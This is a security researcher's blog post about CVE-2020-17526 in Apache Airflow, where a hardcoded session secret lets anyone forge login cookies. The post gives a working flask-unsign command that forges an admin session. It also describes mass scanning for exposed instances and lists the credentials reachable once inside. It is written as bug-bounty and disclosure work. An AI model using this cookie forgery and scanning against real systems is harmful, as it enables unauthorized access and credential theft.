Blast Radius: Apache Airflow Vulnerabilities
Reading time: 9 minutes
Apache Airflow is an open-source workflow management platform that started at Airbnb in 2014 as a solution to manage complex workflows. It allows organizations to programmatically author, schedule and monitor their workflows over their web-based interfaces that are connected to internet databases and many other systems.
While starting at Airbnb, today many organizations use Airflow, with the majority of them in the software and financial services industry and of quite large revenues of over $100 million. A seemingly harmless and just another workflow platform but due to its architecture and number and size of companies using it, Apache Airflow offers a wide attack surface, with vulnerabilities in it leading to less than benign scenarios.
BlastRadius is a new series on our blog where security professionals, researchers and experts will deep dive into different attacks and vulnerabilities and explore how they can impact the whole internet ecosystem and what it means for organizations of all sizes, across all industries. In the first part of our BlastRadius series, we are joined by Ian Carroll.
A security researcher Ian Carroll ran into an Airflow instance exposed to the internet during recon on a bug bounty program which piqued his interest to investigate its security further. He will go over finding older vulnerabilities in Airflow, exploiting and automating critical issues in it and finally, how to find affected companies and the impact of these CVEs to them.
- Understanding the Apache Airflow Vulnerabilities
- Finding older vulnerabilities
- Exploiting CVE-2020-17526
- Finding affected companies
- Impact to affected companies
Understanding the Apache Airflow Vulnerabilities
Earlier this year, I stumbled upon an Apache Airflow instance's web interface when looking through public assets on a bug bounty program. While it was behind authentication, I got curious and started looking into its security and past vulnerabilities, to see if it might be an interesting target. I quickly realized that not only did it have several prior security vulnerabilities, but that it was often connected to numerous systems within a company — a great target to easily cause a lot of damage. I was able to exploit these issues in over ten bug bounty programs, earning many P1s and over $13,000.
Finding older vulnerabilities
Faced with the Airflow login page on this target and never having seen it before, I decided to go dig through old CVEs on Snyk. I was surprised to find quite a few, most of which were in its web interface. However, I had no idea what version of Airflow my target was using, and many seemed to require me to already have logged in to the instance. Since I had no access at this point, I kept looking until I noticed a curious entry from December of 2020, rated as "medium" by Snyk:
Given a default config, it allows a malicious airflow user on site A where they log in normally, to access unauthorized Airflow Webserver on Site B through the session from Site A.
This is a weird way to phrase this issue, as it seems to imply something quite severe — the authentication system for a default Airflow instance is able to generate valid sessions for any other Airflow instance. This must mean that we can log into any instance that didn't change an otherwise obscure configuration value. Contrary to its CVSS rating, this is likely a critical vulnerability!
Exploiting CVE-2020-17526
Looking through the Apache Airflow project, I noticed a pull request that changed the secret_key
configuration setting mentioned in the advisory. It used to be a hardcoded value of temporary_key
, and was moved to a random value around when the advisory was released. So it seems we know the session secret for most Airflow instances was accidentally hardcoded to temporary_key
, but what does this mean for exploiting it?
This seemed like a classic stateless session implementation, like a JSON Web Token (JWT), where the session state is not stored on the server. Instead, the session state is encoded and stored inside a cookie, and is then cryptographically signed to ensure it cannot be tampered with. There are good reasons to implement an authentication and session system like this: when running multiple Airflow servers behind a load balancer, they must all know about your session and that you are logged in. As a result, Airflow either had to require its users to install a data store like Redis to store session data, or it had to make them stateless. Unfortunately, this design critically hinges on the key being unguessable and private — and here, it is hardcoded to the same public value for everyone.
After digging into the Airflow authentication system, which is built on Flask, I saw it was reliant on the session's user_id
value to determine whether we are logged in. If we can change this session value to the user ID of our choice, we can mark ourselves as authenticated within Airflow and become an administrator with almost no effort!
I mentioned JWTs earlier, but this is a slightly different system than a standard JWT. Since Flask is web-application oriented, they implemented a special type of JWT that utilizes compression for the session data, in order to save bandwidth for the application's users. As a result, we can't just go and use standard JWT tools for this — we'll need to find a tool to modify Flask-specific session cookies. Luckily, Paradoxis wrote a Python tool called flask-unsign
which is meant for exactly this use case. We can pass it a new, modified session object and have it sign it with the new session key.
And with this, we have a valid session cookie for user ID #1, who is almost always the first admin of the instance:
% flask-unsign -s --secret "temporary_key" -c "{'_fresh': True, '_id': '<id>', 'csrf_token': '<csrf>', 'user_id': '1'}"
<an admin cookie!>
Incidentally, flask-unsign did not have temporary_key
on its default wordlist, so it did not find this issue out of the box. I submitted a pull request, and now it can find this vulnerability via brute-force just by passing it an Airflow cookie with the "unsign" option!
Finding affected companies
After I found this vulnerability for the first time, I was very interested in finding other affected instances. One of the first things I did was use the SecurityTrails SurfaceBrowser's SQL Explorer interface to find subdomains that contained the word "airflow", which yielded a lot of instances exposed to the internet.
Since we can test for this vulnerability simply based on the response cookies from a simple GET request to the Airflow homepage, I was able to take those SQL results and test those instances on the internet without ever logging in, and I sent several disclosure emails to companies that didn't seem to operate a bug bounty program. Some companies ignored my outreach, but others were thankful for the notice despite not running a disclosure program.
However, I wanted to focus on companies that operate bug bounty programs, as I can go deeper on their recon and yield better results. I have an automation framework that pulls in asset discovery data from SecurityTrails and other recon data sources for bug bounty programs I've been invited to. This allows me to comprehensively scan these assets over HTTP; for instance, like many others I scan for subdomain takeover issues by looking for common error pages on the homepage. When my tool finds one, it sends me an alert on my phone so I can claim the subdomain and report the issue.
I decided to simply bake flask-unsign into my automation, and have it run on every suspicious-looking cookie I received when I was scanning HTTP assets. This worked and it immediately found a few different companies that were vulnerable to this issue, although I had to work through exploiting a company that had implemented their own authentication layer on top of Airflow, which ended up still being vulnerable to this bug.
Eventually, it became unsustainable to run flask-unsign on every cookie, as it takes a lot of CPU resources to guess the key for the cookie. I pivoted to storing these cookies in a database and running flask-unsign on them asynchronously, which allowed me to speed up my crawling.
However, since nearly every company I found hadn't updated Airflow, I decided to also write a simple rule to catch the distinctive Airflow 404 page. My automation would make a request to a path that I knew didn't exist on Airflow, and if it returned the Airflow 404 page, I would know the instance could be vulnerable, and manually take a look at it. While this doesn't directly tell us that it's vulnerable, this is a critical issue, so it's worth the time investment to manually take a look.
Impact to affected companies
Once you have logged into the Airflow instance's web interface, it is almost always a goldmine of impact. As I mentioned earlier, Airflow's design is to interconnect with as many systems as possible, to read and write data from them as it's transformed and modified. As a result, it is typically configured with privileged access to many services that a company is working with.
When I successfully used this vulnerability on my first target, I got access to credentials for AWS, Stripe, Braintree, Datadog, and more. There are a few places you will commonly find impact within the Airflow interface that will show us its blast radius:
- Light damage: You can view the source code of Airflow jobs (called DAGs), which might contain hardcoded credentials or internal information.
- Moderate damage: You can view and change the configuration variables for the Airflow instance. While credentials are supposed to be redacted in the UI, they are often misconfigured and displayed in plaintext, giving you API keys and other secret values.
- Severe damage: On older versions, you can use the "ad-hoc query" interface to issue arbitrary queries to connected data sources. While I’ve not tried to escalate this myself, I believe this equates to intentional SQL injection, which would be an amazing attack on a production database."

In total from exploiting this issue, I made over $13,000 and counting via public and private bug bounty programs, with almost everyone immediately triaging it as a critical issue.
